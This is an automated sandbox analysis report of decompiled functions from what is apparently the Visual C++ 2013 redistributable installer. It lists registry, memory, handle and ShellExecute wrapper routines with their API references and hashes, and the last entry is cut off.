LeaveCriticalSection.KERNEL32(?,?,0128D9E6,?,00000000,75BDA770,?,00000000), ref: 0128BB8F

Strings

userexperience.cpp, xrefs: 0128BBA8
Engine active cannot be changed because it was already in that state., xrefs: 0128BBB2

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
API String ID: 3376869089-1544469594
Opcode ID: 82783774df89c7b3bd22e8d0a0a45b0b27359b9da49087221e994aa8cc4e590f
Instruction ID: e0be170b5259e4333eb906537f3d5b1fd83f17a12125737e8755e2eac1bfde46
Opcode Fuzzy Hash: 82783774df89c7b3bd22e8d0a0a45b0b27359b9da49087221e994aa8cc4e590f
Instruction Fuzzy Hash: A0F02172226315BFE7302E65ACC5DA7779CEB14BE5B00412DFE01A7184E6A0AC0183F0

Uniqueness

Uniqueness Score: -1.00%

Function 012B7E80 Relevance: 7.6, APIs: 5, Instructions: 119
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B7E80(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t62;
				void* _t69;
				void* _t70;

				_t70 = __edx;
				_t69 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				_v20 = 0;
				_v24 = 0;
				_t48 = E012B378B(_a4,  *0x12d4f58, 0x20019,  &_v16);
				_a4 = _t48;
				if(_t48 == 0x80070002 || _t48 < 0) {
					L17:
					if(_v12 != 0) {
						RegCloseKey(_v12);
						_v12 = 0;
					}
					if(_v8 != 0) {
						RegCloseKey(_v8);
						_v8 = 0;
					}
					if(_v16 != 0) {
						RegCloseKey(_v16);
					}
					return _a4;
				} else {
					_t54 = E012B378B(_v16, _a8, 0x20019,  &_v8);
					_a4 = _t54;
					if(_t54 != 0x80070002 && _t54 >= 0) {
						_t56 = E012B378B(_v8,  *0x12d4f5c, 0x20019,  &_v12);
						_a4 = _t56;
						if(_t56 != 0x80070002 && _t56 >= 0) {
							_t57 = E012B396D(_t69, _t70, _v12, _a12, 0, 1);
							_a4 = _t57;
							if(_t57 < 0) {
								goto L17;
							}
							_t59 = E012B3677(_v12,  &_v20, 0);
							_a4 = _t59;
							if(_t59 >= 0 && _v20 <= 0) {
								if(_v12 != 0) {
									RegCloseKey(_v12);
									_v12 = 0;
								}
								_t60 = E012B396D(_t69, _t70, _v8,  *0x12d4f5c, 0, 0);
								_a4 = _t60;
								if(_t60 >= 0) {
									_t62 = E012B3677(_v8, 0,  &_v24);
									_a4 = _t62;
									if(_t62 >= 0 && _v24 == 0) {
										if(_v8 != 0) {
											RegCloseKey(_v8);
											_v8 = 0;
										}
										_a4 = E012B396D(_t69, _t70, _v16, _a8, 0, 0);
									}
								}
							}
						}
					}
					goto L17;
				}
			}

0x012b7e80
0x012b7e80
0x012b7e9e
0x012b7ea1
0x012b7ea4
0x012b7ea7
0x012b7eaa
0x012b7ead
0x012b7eb7
0x012b7ebc
0x012b7fa3
0x012b7fa6
0x012b7fab
0x012b7fb1
0x012b7fb1
0x012b7fb7
0x012b7fbc
0x012b7fc2
0x012b7fc2
0x012b7fcb
0x012b7fd0
0x012b7fd0
0x012b7fda
0x012b7eca
0x012b7ed5
0x012b7eda
0x012b7edf
0x012b7efb
0x012b7f00
0x012b7f05
0x012b7f1c
0x012b7f21
0x012b7f26
0x00000000
0x00000000
0x012b7f30
0x012b7f35
0x012b7f3a
0x012b7f44
0x012b7f49
0x012b7f4f
0x012b7f4f
0x012b7f5d
0x012b7f62
0x012b7f67
0x012b7f71
0x012b7f76
0x012b7f7b
0x012b7f85
0x012b7f8a
0x012b7f90
0x012b7f90
0x012b7fa0
0x012b7fa0
0x012b7f7b
0x012b7f67
0x012b7f3a
0x012b7f05
0x00000000
0x012b7edf

APIs

Part of subcall function 012B378B: RegOpenKeyExW.KERNELBASE(?,00000000,00000000,01291F19,?,00000009,00000000,?,01291BE1,80000002,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,?,00000001), ref: 012B379F

RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,012813BB,012813BB,00020019,00000000,00000001), ref: 012B7F49
RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 012B7F8A
RegCloseKey.ADVAPI32(00000001,00000001,00020019,012813BB,?,012813BB,00000000,00000000,?,012813BB,00000001,00000000), ref: 012B7FAB
RegCloseKey.ADVAPI32(00000000,00000001,00020019,012813BB,?,012813BB,00000000,00000000,?,012813BB,00000001,00000000), ref: 012B7FBC
RegCloseKey.ADVAPI32(012813BB,?,012813BB,00000000,00000000,?,012813BB,00000001,00000000), ref: 012B7FD0

Part of subcall function 012B396D: RegCloseKey.ADVAPI32(00000000), ref: 012B3AD3

Part of subcall function 012B3677: RegQueryInfoKeyW.ADVAPI32(012813BB,00000000,00000000,00000000,?,00000000,00000000,012813BB,00000000,00000000,00000000,00000000,80070002,00000000,?,012B7F35), ref: 012B3692

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: Close$InfoOpenQuery
String ID:
API String ID: 796878624-0
Opcode ID: 61cb5f5c34daeeb31e81ca8094b0777031bc4741f90e4f4d0fe49a9b6faa52f0
Instruction ID: 4d4752532a57c602106babf7937599530e4238ed34b5ea36b6a7dc3ccaf7cf81
Opcode Fuzzy Hash: 61cb5f5c34daeeb31e81ca8094b0777031bc4741f90e4f4d0fe49a9b6faa52f0
Instruction Fuzzy Hash: FB41C974C11129FFCF219F94D8889EDBF75FF44B80F208466F625A6160D3314A91EB94

Uniqueness

Uniqueness Score: -1.00%

Function 0128A63B Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 71
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 57%

			E0128A63B(void* __ecx, void* __edx, struct _CRITICAL_SECTION* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				void* __ebx;
				void* _t19;
				void* _t28;
				void* _t31;
				intOrPtr _t36;

				_t31 = __edx;
				_t30 = __ecx;
				_push(__ecx);
				_v8 = 0;
				EnterCriticalSection(_a4);
				_t19 = E01289B8D(_a4, _t30, _a8,  &_v8);
				_t36 = _v8;
				_t28 = _t19;
				if(_t28 < 0 ||  *((intOrPtr*)(_t36 + 0x10)) != 0) {
					if(_t28 == 0x80070490) {
						goto L13;
					}
					if(_t28 >= 0) {
						if( *((intOrPtr*)(_t36 + 0x10)) != 2 ||  *((intOrPtr*)(_t36 + 0x20)) != 0) {
							_t28 = E012A0EDB(_t30, _t36 + 8, _a12);
							if(_t28 >= 0) {
								goto L13;
							}
							_push(_a8);
							_push("Failed to get value as string for variable: %ls");
							L12:
							_push(_t28);
							E012AFA86();
						} else {
							_t10 = _t36 + 8; // 0xfc4583f8
							_t28 = E0128A947(_t31, _a4,  *_t10, _a12, 0, 0);
							if(_t28 < 0) {
								_push(_a8);
								_t14 = _t36 + 8; // 0xfc4583f8
								E012AFA86(_t28, "Failed to format value \'%ls\' of variable: %ls",  *_t14);
							}
						}
						goto L13;
					}
					_push(_a8);
					_push("Failed to get variable: %ls");
					goto L12;
				} else {
					_t28 = 0x80070490;
					L13:
					LeaveCriticalSection(_a4);
					return _t28;
				}
			}

0x0128a63b
0x0128a63b
0x0128a63e
0x0128a648
0x0128a64b
0x0128a658
0x0128a65d
0x0128a660
0x0128a664
0x0128a678
0x00000000
0x00000000
0x0128a67c
0x0128a68c
0x0128a6cc
0x0128a6d0
0x00000000
0x00000000
0x0128a6d2
0x0128a6d5
0x0128a6da
0x0128a6da
0x0128a6db
0x0128a693
0x0128a693
0x0128a6a4
0x0128a6a8
0x0128a6aa
0x0128a6ad
0x0128a6b6
0x0128a6bb
0x0128a6a8
0x00000000
0x0128a68c
0x0128a67e
0x0128a681
0x00000000
0x0128a66b
0x0128a66b
0x0128a6e3
0x0128a6e6
0x0128a6f2
0x0128a6f2

APIs

EnterCriticalSection.KERNEL32(-00000001,00000000,00000000,00000000,?,?,0128AAC0,?,?,00000000,?,00000001,?,00000002,-00000001,01288B89), ref: 0128A64B
LeaveCriticalSection.KERNEL32(-00000001,00000002,01288B89,?,0128AAC0,?,?,00000000,?,00000001,?,00000002,-00000001,01288B89,00000001), ref: 0128A6E6

Strings

Failed to get value as string for variable: %ls, xrefs: 0128A6D5
Failed to format value '%ls' of variable: %ls, xrefs: 0128A6B0
Failed to get variable: %ls, xrefs: 0128A681

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID: Failed to format value '%ls' of variable: %ls$Failed to get value as string for variable: %ls$Failed to get variable: %ls
API String ID: 3168844106-1273532094
Opcode ID: 88ad62c3469d8201edd9f17cb324e215439368e77d1a167f2e511fce3e1d2047
Instruction ID: 03b7a722c6d9731f42d79518078cabfccd8dd13076cdd65dbdb4d875a6c0e1c2
Opcode Fuzzy Hash: 88ad62c3469d8201edd9f17cb324e215439368e77d1a167f2e511fce3e1d2047
Instruction Fuzzy Hash: B911E131221616FFCF22BF65CC84CBE3BA8FBD8358B204516F61553155DBB29A108BA1

Uniqueness

Uniqueness Score: -1.00%

Function 012ADB75 Relevance: 7.6, APIs: 5, Instructions: 68
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E012ADB75(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x12d5854, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x12d5d74 - _t7;
								if(__eflags == 0) {
									_t9 = E012AA279(__eflags);
									 *_t9 = E012AA237(GetLastError());
									goto L17;
								} else {
									__eflags = E012AB573(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E012AA279(__eflags);
										 *_t12 = E012AA237(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E012AB573(_t6, _t30);
						 *((intOrPtr*)(E012AA279(__eflags))) = 0xc;
						goto L12;
					} else {
						E012AB248(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E012AB4D0(__edx, __edi, __esi, _a8);
				}
			}

0x012adb7e
0x012adb8b
0x012adb8c
0x012adb8f
0x012adb91
0x012adba0
0x012adbd3
0x012adbd3
0x012adbd6
0x00000000
0x00000000
0x012adba3
0x012adba5
0x012adba7
0x012adba7
0x012adba7
0x012adbb4
0x012adbba
0x012adbbc
0x012adbbe
0x012adc1e
0x012adc1e
0x012adbc0
0x012adbc0
0x012adbc6
0x012adc08
0x012adc1c
0x00000000
0x012adbc8
0x012adbcf
0x012adbd1
0x012adbf0
0x012adc04
0x012adbea
0x012adbea
0x012adbea
0x00000000
0x00000000
0x00000000
0x012adbd1
0x012adbc6
0x00000000
0x012adbec
0x012adbd9
0x012adbe4
0x00000000
0x012adb93
0x012adb96
0x012adb9c
0x012adb9c
0x012adbed
0x012adbef
0x012adb80
0x012adb8a
0x012adb8a

APIs

_malloc.LIBCMT ref: 012ADB83

Part of subcall function 012AB4D0: __FF_MSGBANNER.LIBCMT ref: 012AB4E9
Part of subcall function 012AB4D0: __NMSG_WRITE.LIBCMT ref: 012AB4F0
Part of subcall function 012AB4D0: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,012ABF87,00000000,00000001,00000000,?,012AB736,00000018,012D1FB0,0000000C,012AB7C6), ref: 012AB515

_free.LIBCMT ref: 012ADB96

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 1823c90a9f827a91091227c465acb8778585c76e33ac0311909e834c71eed9ce
Instruction ID: b27b7df023c9a585a8877c1fb50e3fc264a84047682959f68868afec8bfdfb35
Opcode Fuzzy Hash: 1823c90a9f827a91091227c465acb8778585c76e33ac0311909e834c71eed9ce
Instruction Fuzzy Hash: 1C11E73246422BEFCF322FF8F808A693B999F503B0B900825E5549B960EE75C580C790

Uniqueness

Uniqueness Score: -1.00%

Function 012A4762 Relevance: 7.5, APIs: 5, Instructions: 37
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012A4762(void* __edi, signed int* __esi) {
				void* _t11;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t15;
				void* _t16;
				signed int* _t26;

				_t26 = __esi;
				if(__esi != 0) {
					_t12 =  *__esi;
					if(_t12 != 0) {
						CloseHandle(_t12);
						 *__esi =  *__esi & 0x00000000;
					}
					_t13 = _t26[1];
					if(_t13 != 0) {
						CloseHandle(_t13);
						_t26[1] = _t26[1] & 0x00000000;
					}
					_t14 = _t26[2];
					if(_t14 != 0) {
						CloseHandle(_t14);
						_t26[2] = _t26[2] & 0x00000000;
					}
					_t15 = _t26[3];
					if(_t15 != 0) {
						CloseHandle(_t15);
						_t26[3] = _t26[3] & 0x00000000;
					}
					_t16 = _t26[4];
					if(_t16 != 0) {
						UnmapViewOfFile(_t16);
					}
					return E012B24F6(_t26);
				}
				return _t11;
			}

0x012a4762
0x012a4764
0x012a4766
0x012a4771
0x012a4774
0x012a4776
0x012a4776
0x012a4779
0x012a477e
0x012a4781
0x012a4783
0x012a4783
0x012a4787
0x012a478c
0x012a478f
0x012a4791
0x012a4791
0x012a4795
0x012a479a
0x012a479d
0x012a479f
0x012a479f
0x012a47a3
0x012a47a9
0x012a47ac
0x012a47ac
0x00000000
0x012a47b3
0x012a47b8

APIs

CloseHandle.KERNEL32(?,00000000,012A4D02), ref: 012A4774
CloseHandle.KERNEL32(?,00000000,012A4D02), ref: 012A4781
CloseHandle.KERNEL32(?,00000000,012A4D02), ref: 012A478F
CloseHandle.KERNEL32(?,00000000,012A4D02), ref: 012A479D
UnmapViewOfFile.KERNEL32(?,012A4D02), ref: 012A47AC

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseHandle$FileUnmapView
String ID:
API String ID: 260491571-0
Opcode ID: 2325bac5dcf4ea004d16f6dca4790968bf78fdf5eb6e1139ea31518baa554c8b
Instruction ID: 2048dabcbef3cbac8e0bd9ec11b7e93beea0043e546df05c93aa034310537651
Opcode Fuzzy Hash: 2325bac5dcf4ea004d16f6dca4790968bf78fdf5eb6e1139ea31518baa554c8b
Instruction Fuzzy Hash: CAF062712207829BE734EE79CC88B2B7BECAF45751F89881CE695D3540D778E4008B60

Uniqueness

Uniqueness Score: -1.00%

Function 012AC315 Relevance: 7.5, APIs: 5, Instructions: 34
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 77%

			E012AC315(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x12d2010);
				E012A9B40(__ebx, __edi, __esi);
				_t28 = E012A9852(__ebx, _t31);
				_t12 =  *0x12d4e40; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E012AB7AB(_t20, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E012AC2C8(_t29,  *0x12d4698);
					 *(_t30 - 4) = 0xfffffffe;
					E012AC382();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E012A9852(_t20, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					_push(0x20);
					E012A8D1D(_t25, _t34);
				}
				return E012A9B85(_t29);
			}

0x012ac315
0x012ac315
0x012ac315
0x012ac315
0x012ac315
0x012ac317
0x012ac31c
0x012ac326
0x012ac328
0x012ac330
0x012ac354
0x012ac356
0x012ac35c
0x012ac366
0x012ac371
0x012ac374
0x012ac37b
0x012ac332
0x012ac332
0x012ac336
0x00000000
0x012ac338
0x012ac33d
0x012ac33d
0x012ac336
0x012ac340
0x012ac342
0x012ac344
0x012ac346
0x012ac34b
0x012ac353

APIs

__getptd.LIBCMT ref: 012AC321

Part of subcall function 012A9852: __getptd_noexit.LIBCMT ref: 012A9855
Part of subcall function 012A9852: __amsg_exit.LIBCMT ref: 012A9862

__getptd.LIBCMT ref: 012AC338
__amsg_exit.LIBCMT ref: 012AC346
__lock.LIBCMT ref: 012AC356
__updatetlocinfoEx_nolock.LIBCMT ref: 012AC36A

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 82c5aa66479db06a1d5c54b038b6a0c9f4b3a3f2dde4bd2d9213b152e22b9958
Instruction ID: 011bfa7d072246aaaa49b075f9a214ff73f25669a353563daf53f77aa45514fe
Opcode Fuzzy Hash: 82c5aa66479db06a1d5c54b038b6a0c9f4b3a3f2dde4bd2d9213b152e22b9958
Instruction Fuzzy Hash: ECF02432D74302DFDB25BB78A801B2D3BA06F24725FD0411CD158AB1C0CFB04650CB81

Uniqueness

Uniqueness Score: -1.00%

Function 012B6285 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B6285(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				struct _SHELLEXECUTEINFOW _v64;
				intOrPtr* _t34;
				intOrPtr _t37;
				void* _t38;
				void* _t39;
				void* _t40;
				void* _t41;
				intOrPtr _t44;
				void* _t45;
				void* _t47;
				void* _t48;
				void* _t51;
				void* _t55;

				_t51 = 0;
				E012A7E30( &_v64, 0, 0x3c);
				_v64.hwnd = _a24;
				_v64.lpVerb = _a12;
				_v64.lpFile = _a4;
				_v64.lpParameters = _a8;
				_v64.lpDirectory = _a16;
				_v64.nShow = _a20;
				_v64.cbSize = 0x3c;
				_v64.fMask = 0x540;
				if(ShellExecuteExW( &_v64) != 0) {
					_t34 = _a28;
					if(_t34 != 0) {
						_v64.hProcess = _v64.hProcess & 0;
						 *_t34 = _v64.hProcess;
					}
					L24:
					if(_v64.hProcess != 0) {
						CloseHandle(_v64.hProcess);
					}
					return _t51;
				}
				_t37 = _v64.hInstApp;
				_t55 = _t37 - 0x1b;
				if(_t55 > 0) {
					_t38 = _t37 - 0x1c;
					if(_t38 == 0) {
						L21:
						_t51 = 0x80070484;
						goto L24;
					}
					_t39 = _t38 - 1;
					if(_t39 == 0) {
						goto L21;
					}
					_t40 = _t39 - 1;
					if(_t40 == 0) {
						goto L21;
					}
					_t41 = _t40 - 1;
					if(_t41 == 0) {
						L20:
						_t51 = 0x80070483;
						goto L24;
					}
					if(_t41 == 1) {
						_t51 = 0x80070485;
						goto L24;
					}
					L18:
					_t51 = 0x80004005;
					goto L24;
				}
				if(_t55 == 0) {
					goto L20;
				}
				_t44 = _t37;
				if(_t44 == 0) {
					_t51 = 0x80070002;
					goto L24;
				}
				_t45 = _t44 - 1;
				if(_t45 == 0) {
					_t51 = 0x80070003;
					goto L24;
				}
				_t47 = _t45;
				if(_t47 == 0) {
					_t51 = 0x80070005;
					goto L24;
				}
				_t48 = _t47 - 3;
				if(_t48 == 0) {
					_t51 = 0x8007000e;
					goto L24;
				}
				if(_t48 != 3) {
					goto L18;
				}
				_t51 = 0x8007000b;
				goto L24;
			}

0x012b628e
0x012b6295
0x012b629d
0x012b62a3
0x012b62a9
0x012b62af
0x012b62b5
0x012b62bb
0x012b62c5
0x012b62cc
0x012b62db
0x012b634c
0x012b6351
0x012b6356
0x012b6359
0x012b6359
0x012b635b
0x012b635f
0x012b6364
0x012b6364
0x012b636e
0x012b636e
0x012b62dd
0x012b62e0
0x012b62e3
0x012b631f
0x012b6322
0x012b6345
0x012b6345
0x00000000
0x012b6345
0x012b6324
0x012b6325
0x00000000
0x00000000
0x012b6327
0x012b6328
0x00000000
0x00000000
0x012b632a
0x012b632b
0x012b633e
0x012b633e
0x00000000
0x012b633e
0x012b632e
0x012b6337
0x00000000
0x012b6337
0x012b6330
0x012b6330
0x00000000
0x012b6330
0x012b62e5
0x00000000
0x00000000
0x012b62e8
0x012b62e9
0x012b6318
0x00000000
0x012b6318
0x012b62eb
0x012b62ec
0x012b6311
0x00000000
0x012b6311
0x012b62ef
0x012b62f0
0x012b630a
0x00000000
0x012b630a
0x012b62f2
0x012b62f5
0x012b6303
0x00000000
0x012b6303
0x012b62fa
0x00000000
0x00000000
0x012b62fc
0x00000000

APIs

_memset.LIBCMT ref: 012B6295
ShellExecuteExW.SHELL32(?), ref: 012B62D3
CloseHandle.KERNEL32(00000000,?,?,?), ref: 012B6364

Strings

<, xrefs: 012B62C5

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: CloseExecuteHandleShell_memset
String ID: <
API String ID: 1378689676-4251816714
Opcode ID: e22d74e1da3743c68fd0c251614a9de395bd0dd902927896560e0d0a5c5d35ca
Instruction ID: 7bd82f55214d4f5f94772c69d34d482ad189ae3c438b9c96f13939b4d8f4270c
Opcode Fuzzy Hash: e22d74e1da3743c68fd0c251614a9de395bd0dd902927896560e0d0a5c5d35ca
Instruction Fuzzy Hash: 2A316F75D3651BDBDB10CF9CC4C5AED7AB4EB04BA0F1C8016EA16E7241D7788941CB94

Uniqueness

Uniqueness Score: -1.00%

Function 012972F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E012972F0(void* __edx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v8;
				intOrPtr _v16;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				void* __esi;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				void* _t38;
				intOrPtr _t39;
				void* _t43;

				_t43 = __eflags;
				_t34 = __edx;
				E012A7E30( &_v56, 0, 0x30);
				_t35 = _a8;
				_v8 = 0;
				_v56 = _a4;
				_v52 = _t35;
				_v48 = _t35;
				if(E01296520( &_v56, _t43) >= 0) {
					_t38 = E0129712B(_t31, _t34,  &_v56,  &_v8);
					__eflags = _t38;
					if(__eflags >= 0) {
						_t38 = E01296D90( &_v56, 1);
						__eflags = _t38;
						if(__eflags >= 0) {
							_t39 = _v8;
							_push(E01291890(_t39));
							E01281566(3, 0x20000034, _t35);
							 *_a12 = _t39;
							_t38 = 0;
							__eflags = 0;
						} else {
							_push("Failed to expect end symbol.");
							goto L6;
						}
					} else {
						_push("Failed to parse expression.");
						goto L6;
					}
				} else {
					_push("Failed to read next symbol.");
					L6:
					_push(_t38);
					E012AFA86();
				}
				_t45 = _v16;
				if(_v16 != 0) {
					E012AF521(_t34, _t45, _t38, 0xe0000033, 0, _t35, 0, 0);
				}
				return _t38;
			}

0x012972f0
0x012972f0
0x01297302
0x0129730a
0x01297313
0x01297316
0x01297319
0x0129731c
0x01297328
0x0129733e
0x01297340
0x01297342
0x01297355
0x01297357
0x01297359
0x0129736a
0x01297373
0x0129737c
0x01297387
0x01297389
0x01297389
0x0129735b
0x0129735b
0x00000000
0x0129735b
0x01297344
0x01297344
0x00000000
0x01297344
0x0129732a
0x0129732a
0x01297360
0x01297360
0x01297361
0x01297367
0x0129738b
0x0129738e
0x0129739a
0x0129739a
0x012973a5

APIs

_memset.LIBCMT ref: 01297302

Strings

Failed to read next symbol., xrefs: 0129732A
Failed to parse expression., xrefs: 01297344
Failed to expect end symbol., xrefs: 0129735B

Memory Dump Source

Source File: 00000020.00000002.351931558.0000000001281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 01280000, based on PE: true

Associated: 00000020.00000002.351918266.0000000001280000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352016074.00000000012D4000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000020.00000002.352028701.00000000012DA000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_32_2_1280000_vcredist_2013_x64.jbxd

Similarity

API ID: _memset
String ID: Failed to expect end symbol.$Failed to parse expression.$Failed to read next symbol.
API String ID: 2102423945-1316734955
Opcode ID: 67077a98d91346147cc0fc86f26357163e99beaf3e4023a1a0e9aaadd5731631
Instruction ID: e71098ef5490f4ca940c0928de14a7d34c31d6e8732a89c4297d94ffb9409fec
